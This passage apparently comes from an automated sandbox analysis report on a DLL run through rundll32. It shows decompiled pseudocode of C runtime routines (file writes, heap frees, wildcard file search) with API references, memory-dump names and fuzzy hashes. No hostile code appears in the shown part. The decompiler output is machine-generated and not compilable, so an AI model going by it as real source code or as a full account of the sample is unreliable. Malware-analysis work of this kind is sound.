									 *(_t255 +  *((intOrPtr*)(0x6f35e428 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x6f35e428 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E6F320CDA( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6F320CDA();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6F31C65E(_v8 ^ _t294);
			}

0x6f323136
0x6f32313d
0x6f323140
0x6f323145
0x6f32314d
0x6f323150
0x6f323154
0x6f323157
0x6f323161
0x6f32316b
0x6f32316d
0x6f323170
0x6f323173
0x6f323179
0x6f32317b
0x6f323182
0x6f32318f
0x6f323190
0x6f323193
0x6f323196
0x6f323197
0x6f323198
0x6f32319b
0x6f3231a0
0x6f3234ac
0x6f3234ac
0x6f3231a6
0x6f3231a6
0x6f3231a9
0x6f3231ab
0x6f3231b1
0x6f3231b4
0x6f3231bb
0x6f3231c2
0x6f3231cb
0x00000000
0x00000000
0x6f3231d1
0x6f3231d7
0x6f3231d9
0x6f3231db
0x6f3231de
0x6f3231e3
0x6f3231e7
0x00000000
0x00000000
0x00000000
0x6f3231e7
0x6f3231ec
0x6f3231ef
0x6f3231f1
0x6f3231f6
0x6f3232a8
0x6f3232a9
0x6f3232ac
0x6f3232ae
0x6f32345c
0x6f32345e
0x00000000
0x6f323460
0x6f323460
0x6f323463
0x6f323466
0x6f32346f
0x6f323472
0x6f323473
0x6f323477
0x6f32347a
0x6f32347a
0x00000000
0x6f32347e
0x6f3232b4
0x6f3232b4
0x6f3232b9
0x6f3232bc
0x6f3232c2
0x6f3232c8
0x6f3232d1
0x6f3232d4
0x6f3232d4
0x6f3232d5
0x6f3232d6
0x6f3232d9
0x6f3232da
0x00000000
0x6f3232da
0x6f3231fc
0x6f32320b
0x6f32320c
0x6f32320f
0x6f323211
0x6f323216
0x6f323427
0x6f323429
0x6f32342b
0x6f32342e
0x6f323433
0x6f32343c
0x6f32343f
0x6f323440
0x6f323444
0x6f323447
0x6f32344a
0x6f32344a
0x6f32344e
0x6f32344e
0x6f32344e
0x6f323451
0x6f323451
0x6f323451
0x6f323453
0x6f323453
0x6f323457
0x6f32321c
0x6f32321c
0x6f323220
0x6f323222
0x6f323225
0x6f323228
0x6f32322c
0x6f32322d
0x6f323231
0x6f323231
0x6f323234
0x6f323239
0x6f323245
0x6f32324a
0x6f32324d
0x6f32324d
0x6f323252
0x6f323254
0x6f323257
0x6f323259
0x6f32325c
0x6f32325f
0x6f323262
0x6f32326a
0x6f32326e
0x6f323272
0x6f323272
0x6f323278
0x6f32327e
0x6f323281
0x6f323289
0x6f323290
0x6f323294
0x6f323295
0x6f323298
0x6f323299
0x6f3232dd
0x6f3232dd
0x6f3232e1
0x6f3232e2
0x6f3232e7
0x6f3232ed
0x00000000
0x6f3232f3
0x6f3232f7
0x6f323380
0x6f323387
0x6f32338f
0x6f323397
0x6f32339c
0x6f32339f
0x6f3233a4
0x00000000
0x6f3233aa
0x6f3233bf
0x6f3234a3
0x6f3234a9
0x00000000
0x6f3233c5
0x6f3233ce
0x6f3233d0
0x6f3233d6
0x00000000
0x6f3233dc
0x6f3233e0
0x6f323416
0x6f323419
0x00000000
0x6f32341f
0x6f32341f
0x00000000
0x6f32341f
0x6f3233e2
0x6f3233e4
0x6f3233e6
0x6f3233ff
0x00000000
0x6f323405
0x6f323409
0x00000000
0x6f32340f
0x6f32340f
0x6f323412
0x6f323413
0x00000000
0x6f323413
0x6f323409
0x6f3233ff
0x6f3233e0
0x6f3233d6
0x6f3233bf
0x6f3233a4
0x6f3232ed
0x6f323216
0x00000000
0x6f3232fe
0x6f3232fe
0x6f323301
0x6f323305
0x6f323308
0x6f32332a
0x6f32332d
0x6f323332
0x6f323336
0x6f32333a
0x6f323368
0x6f32336a
0x00000000
0x6f32333c
0x6f32333c
0x6f32333f
0x6f323342
0x6f323345
0x6f323480
0x6f323483
0x6f323490
0x6f32349b
0x6f3234a0
0x00000000
0x6f32334b
0x6f323352
0x6f323357
0x6f32335a
0x6f32335d
0x00000000
0x6f323363
0x6f323363
0x00000000
0x6f323363
0x6f32335d
0x6f323345
0x6f32330a
0x6f323311
0x6f323316
0x6f32331c
0x6f32331e
0x6f323325
0x6f32336b
0x6f32336e
0x6f32336f
0x6f323374
0x6f323377
0x6f32337a
0x00000000
0x00000000
0x00000000
0x00000000
0x6f32337a
0x00000000
0x6f323308
0x6f3231a9
0x6f3234af
0x6f3234af
0x6f3234b1
0x6f3234b4
0x6f3234b4
0x6f3234b4
0x6f3234b4
0x6f3234c6
0x6f3234c8
0x6f3234c9
0x6f3234ca
0x6f3234d6

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6F323173
__fassign.LIBCMT ref: 6F323352
__fassign.LIBCMT ref: 6F32336F
WriteFile.KERNEL32(?,6F3207E3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3233B7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F3233F7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3234A3

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 888084885210c14a4dbd7ffe799e3b235d4dc37c16a856e13442a61aac091610
Instruction ID: 46a6529ccc1d6abdb9588dcd5e5faa58c37f0696ffb8056b1e743df6b7e2dcd2
Opcode Fuzzy Hash: 888084885210c14a4dbd7ffe799e3b235d4dc37c16a856e13442a61aac091610
Instruction Fuzzy Hash: 6AD1B975D002589FDF05CFA8C8819EDBBF9BF49324F2401AAE855FB241D731AA42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F31D7C6, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F31D7C6(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x6f3460c0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E6F31DAD7(__eflags,  *0x6f3460c0);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F31DB12(__eflags,  *0x6f3460c0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E6F31FE6C(_t16);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F31DB12(__eflags,  *0x6f3460c0, 0);
								} else {
									__eflags = E6F31DB12(__eflags,  *0x6f3460c0, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F31E93F(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x6f31d7cd
0x6f31d7e0
0x6f31d7e7
0x6f31d7ea
0x6f31d7ed
0x6f31d806
0x6f31d806
0x6f31d7ef
0x6f31d7ef
0x6f31d7f1
0x6f31d7fb
0x6f31d801
0x6f31d802
0x6f31d804
0x6f31d80b
0x6f31d80d
0x6f31d814
0x6f31d818
0x6f31d81a
0x6f31d82e
0x6f31d82e
0x6f31d837
0x6f31d81c
0x6f31d82a
0x6f31d82c
0x6f31d840
0x6f31d842
0x6f31d842
0x00000000
0x00000000
0x00000000
0x6f31d82c
0x6f31d845
0x00000000
0x00000000
0x00000000
0x6f31d804
0x6f31d7f1
0x6f31d84d
0x6f31d857
0x6f31d7cf
0x6f31d7d1
0x6f31d7d1

APIs

GetLastError.KERNEL32(00000001,?,6F31D578,6F31CC5A,6F31C7BB,?,6F31C9D8,?,00000001,?,?,00000001,?,6F344F78,0000000C,6F31CACC), ref: 6F31D7D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F31D7E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F31D7FB
SetLastError.KERNEL32(00000000,6F31C9D8,?,00000001,?,?,00000001,?,6F344F78,0000000C,6F31CACC,?,00000001,?), ref: 6F31D84D

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f22f48a12517b5fb0dd2d3adfa5d514bf0c6d94c84a0bc68e85856b52df9a467
Instruction ID: bc431c1e8930bf4ba0d52d70ba7e9a7b0ed2e3ca24e3def14019fbcd813638dd
Opcode Fuzzy Hash: f22f48a12517b5fb0dd2d3adfa5d514bf0c6d94c84a0bc68e85856b52df9a467
Instruction Fuzzy Hash: 5501F73220DB116FAB1CAA7CAC85A473BAEEF43778720433EE5114A2D0EF135818D150

Uniqueness

Uniqueness Score: -1.00%

Function 6F321D1D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321D1D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6F3227A9(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6F3227A9(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6F32016E(GetLastError());
									_t17 =  *((intOrPtr*)(E6F3201A4(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6F321DE4(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F32016E(GetLastError());
						_t17 =  *((intOrPtr*)(E6F3201A4(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6F321DE4(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F321E0B(_a8);
				return 0;
			}

0x6f321d23
0x6f321d28
0x6f321d3c
0x6f321d3f
0x6f321d71
0x6f321d79
0x6f321d7b
0x6f321d94
0x6f321d97
0x6f321d9a
0x6f321da8
0x6f321db7
0x6f321dbf
0x6f321dc1
0x6f321dda
0x6f321ddd
0x6f321ddd
0x6f321dc3
0x6f321dca
0x6f321dd5
0x6f321dd5
0x6f321ddf
0x6f321de0
0x00000000
0x6f321de0
0x6f321d9f
0x6f321da4
0x6f321da6
0x00000000
0x00000000
0x00000000
0x6f321da6
0x6f321d84
0x6f321d8f
0x00000000
0x6f321d8f
0x6f321d41
0x6f321d44
0x6f321d47
0x6f321d5a
0x6f321d5d
0x6f321d5f
0x6f321d61
0x00000000
0x6f321d61
0x6f321d4d
0x6f321d52
0x6f321d54
0x00000000
0x00000000
0x00000000
0x6f321d54
0x6f321d2d
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F321D22

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: bce1fd6915f848572d91c4580dec105ee25c6be775b0292de9883374af9d298b
Instruction ID: 79f470c77d70edead86989fd86dcf9f4024f68096861de2cd21dc0e7a4171a9d
Opcode Fuzzy Hash: bce1fd6915f848572d91c4580dec105ee25c6be775b0292de9883374af9d298b
Instruction Fuzzy Hash: E0215E75608215FFEB20AFA58E8096B77EDAE413A97004619E954AB190EF33FC5187B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31F49B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6F31F49B(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6f328124(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6f31f4a1
0x6f31f4a5
0x6f31f4b0
0x6f31f4b8
0x6f31f4c3
0x6f31f4c9
0x6f31f4cd
0x6f31f4d4
0x6f31f4da
0x6f31f4da
0x6f31f4dc
0x6f31f4e1
0x00000000
0x6f31f4e6
0x6f31f4ef

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F31F44D,?,?,6F31F415,?,00000001,?), ref: 6F31F4B0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F31F4C3
FreeLibrary.KERNEL32(00000000,?,?,6F31F44D,?,?,6F31F415,?,00000001,?), ref: 6F31F4E6

Strings

mscoree.dll, xrefs: 6F31F4A9
CorExitProcess, xrefs: 6F31F4BB

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cb9ffe15d4796d88316ddfe3817dd1cba03d749448c6024f2d539b54dec4adf9
Instruction ID: 3257add70971b96f7470e5f77f3aaa1686503df909451f9539444d49402c887e
Opcode Fuzzy Hash: cb9ffe15d4796d88316ddfe3817dd1cba03d749448c6024f2d539b54dec4adf9
Instruction Fuzzy Hash: 1DF08231909A18FBDF11DB50CD09BDE7EBCEF05325F00806AF904A1190CF359E20DA94

Uniqueness

Uniqueness Score: -1.00%

Function 6F324706, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F324706(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6f346790; // 0x6f3467e0
					if(_t23 != 0) {
						E6F31FEFF(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f346794; // 0x6f35e7e8
					if(_t24 != 0) {
						E6F31FEFF(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f346798; // 0x6f35e7e8
					if(_t25 != 0) {
						E6F31FEFF(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f3467c0; // 0x6f3467e4
					if(_t26 != 0) {
						E6F31FEFF(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6f3467c4; // 0x6f35e7ec
					if(_t27 != 0) {
						return E6F31FEFF(_t6);
					}
				}
				return _t6;
			}

0x6f32470c
0x6f324711
0x6f324715
0x6f32471b
0x6f32471e
0x6f324723
0x6f324727
0x6f32472d
0x6f324730
0x6f324735
0x6f324739
0x6f32473f
0x6f324742
0x6f324747
0x6f32474b
0x6f324751
0x6f324754
0x6f324759
0x6f32475a
0x6f32475d
0x6f324763
0x00000000
0x6f32476b
0x6f324763
0x6f32476e

APIs

_free.LIBCMT ref: 6F32471E

Part of subcall function 6F31FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F324730
_free.LIBCMT ref: 6F324742
_free.LIBCMT ref: 6F324754
_free.LIBCMT ref: 6F324766

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 28199ce3b2b32fa464352e2ce5618c1e3df2d240b52bc7f88625d8936f76b2fc
Instruction ID: 064b918a12af7983137c8934a04f1e4603c000f925be143d9650025a6cd4e84e
Opcode Fuzzy Hash: 28199ce3b2b32fa464352e2ce5618c1e3df2d240b52bc7f88625d8936f76b2fc
Instruction Fuzzy Hash: DDF0FF31508744DB8A14EE6CE5C5C5F7BDDFA82764761180AE079D7A42CF21F8844AA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F321699, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6F321699(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				_t320 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E6F31F7DC(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6F324A43(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6F3200F7();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E6F3201B7(_t242, _t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E6F324A43(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6F321C8B(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6F31FEFF(_t302);
														_t305 = _v12;
													}
													E6F31FEFF(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E6F324A43(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6F3200F7();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0x6f34609c; // 0x206de7d6
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6F324A90(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6F32167A(_t245 - _t289 + 1, _t289,  &_v676, E6F321B96(_t279, __eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
